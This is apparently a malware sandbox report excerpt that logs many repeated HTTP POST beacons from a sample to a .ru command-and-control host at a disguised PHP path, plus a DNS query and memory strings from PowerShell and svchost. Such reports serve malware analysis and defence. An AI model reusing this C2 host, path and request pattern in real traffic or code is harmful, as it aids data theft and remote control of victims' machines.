                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1260Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1260Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1248Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continue
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficDNS traffic detected: DNS query: 861848cm.nyashkoon.ru
                            Source: unknownHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                            Source: qmgr.db.24.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: powershell.exe, 00000004.00000002.2672003595.000001DD10075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3162496814.0000016710076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3227843973.0000024D3A465000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3015277632.0000023D10076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3035136841.000001F25AF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000004.00000002.1808534246.000001DD00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24B128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: EQdhBjQw4G.exe, 00000000.00000002.1680880366.0000000003B7D000.00000004.00000800.00020000.00000000.sdmp, EQdhBjQw4G.exe, 00000000.00000002.1680880366.000000000355F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808534246.000001DD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A3F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24AF01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000004.00000002.1808534246.000001DD00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24B128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
